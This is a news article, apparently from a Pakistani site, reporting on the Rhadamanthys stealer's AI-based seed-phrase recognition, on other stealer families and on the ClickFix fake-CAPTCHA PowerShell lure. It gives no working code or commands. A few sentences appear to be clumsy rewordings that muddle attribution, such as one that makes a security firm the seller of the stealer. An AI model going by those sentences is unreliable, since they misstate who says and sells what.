15 C
Pakistan
Monday, February 17, 2025

AI-Powered Rhadamanthys Stealer Uses Image Recognition to Target Cryptocurrency Wallets

Artificial intelligence (AI) for optical character recognition (OCR) is one of the latest advanced features that the threat actors behind the Rhadamanthys information stealer have introduced to the malware under the guise of “Seed Phrase Image Recognition.”

According to Recorded Future’s Insikt Group, which examined version 0.7.0 of the virus, “this allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies.”

“The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation.”

Along with Lumma and other malware-as-a-service (MaaS) providers, Rhadamanthys was first found in the wild in September 2022 and has since become one of the most powerful information thieves.

The malware’s creator, going by the name “kingcrete” (also known as “kingcrete2022”), finds ways to promote the updated versions on Telegram, Jabber, and TOX, despite facing bans from underground forums like Exploit and XSS for targeting organizations in Russia and the former Soviet Union.

The cybersecurity startup, which Mastercard is expected to purchase for $2.65 billion, said that their stealer is available for $250 per month (or $550 for ninety days) on a subscription basis, enabling users to extract a variety of private data from infected servers.

This includes data stored in many programs, browser passwords, cryptocurrency wallets, system information, credentials, and cookies, all the while making efforts to impede research within sandboxed environments more difficult.

Rhadamanthys’s most current version, 0.7.0, was released in June 2024 and is a major improvement over version 0.6.0, which was released in February 2024.

According to Recorded Future, it includes a “complete rewrite of both client-side and server-side frameworks, improving the program’s execution stability.” “30 wallet-cracking algorithms, AI-driven visuals, and PDF recognition for word extraction were introduced as well. The capacity to extract text was improved to recognize several saved phrases.”

In an apparent attempt to avoid being discovered by security programs installed on the host, a capability that permits threat actors to launch and install Microsoft Software Installer (MSI) files is also included. Additionally, it has a setting that prohibits re-execution for a user-specified period of time.

AI-Powered Rhadamanthys Stealer

One notable feature of Rhadamanthys is its plugin system, which adds reverse proxy, cryptocurrency clipper, and keylogger capability to enhance its capabilities.

Cybercriminals frequently choose rhadamanthys, according to Recorded Future. “Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of.”

The news was released at the same time that Google-owned Mandiant revealed how Lumma Stealer manipulated the malware’s execution by using specialized control flow indirection.

“This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections,” claimed researchers Nino Isakovic and Chuong Dong.

In recent weeks, updates have been discovered to be released by Rhadamanthys and Lumma as well as other stealer malware families like Meduza, StealC, Vidar, and WhiteSnake. These updates are designed to gather cookies from the Chrome web browser, thereby evading recently implemented security measures like app-bound encryption.

To further emphasize how the malware landscape is constantly changing, the creators of the WhiteSnake Stealer have added the capability to collect CVC codes from credit cards that are stored in Chrome.

AI-Powered Rhadamanthys Stealer

But that’s not all. Researchers have discovered an Amadey malware campaign that uses an AutoIt script to force the user to submit their Google account credentials by forcing their browser to open in kiosk mode. The login credentials are saved on disk in the browser’s credential store so that they can be later retrieved by hackers like StealC.

These continuous upgrades also come in response to the identification of fresh drive-by download campaigns that propagate information theft by duping users into manually copying and running PowerShell scripts in order to authenticate themselves via a phony CAPTCHA verification page.

According to CloudSEK, eSentire, Palo Alto Networks Unit 42, and Secureworks, as part of the campaign, users looking for video streaming services on Google are redirected to a malicious URL that asks them to press the Windows button + R to open the Run menu, paste an encoded PowerShell command, and execute it.

The attack is a variation of the ClickFix campaign that ReliaQuest, Proofpoint, McAfee Labs, and Trellix have been documenting in recent months. It finally delivers stealers like Lumma, StealC, and Vidar.

“This novel attack vector poses significant risk, as it circumvents browser security controls by opening a command prompt,” warned Secureworks. “The victim is then directed to execute unauthorized code directly on their host.”

Additionally, it has been noted that phishing and malvertising efforts are disseminating Atomic macOS Stealer (AMOS), Rilide, and a recently discovered stealer malware variant known as Snake Keylogger (also known as 404 Keylogger or KrakenKeylogger).

In addition, a cybercrime group called Marko Polo has used information thieves such as Atomic, Rhadamanthys, and StealC to conduct over 30 scam campaigns in which they pose as reputable companies in the fields of productivity software, online gaming, and virtual meetings in order to steal cryptocurrency across platforms.

“Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media — highlighting its focus on tech-savvy victims,” Recorded Future stated, adding that “likely tens of thousands of devices have been compromised globally.”

Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles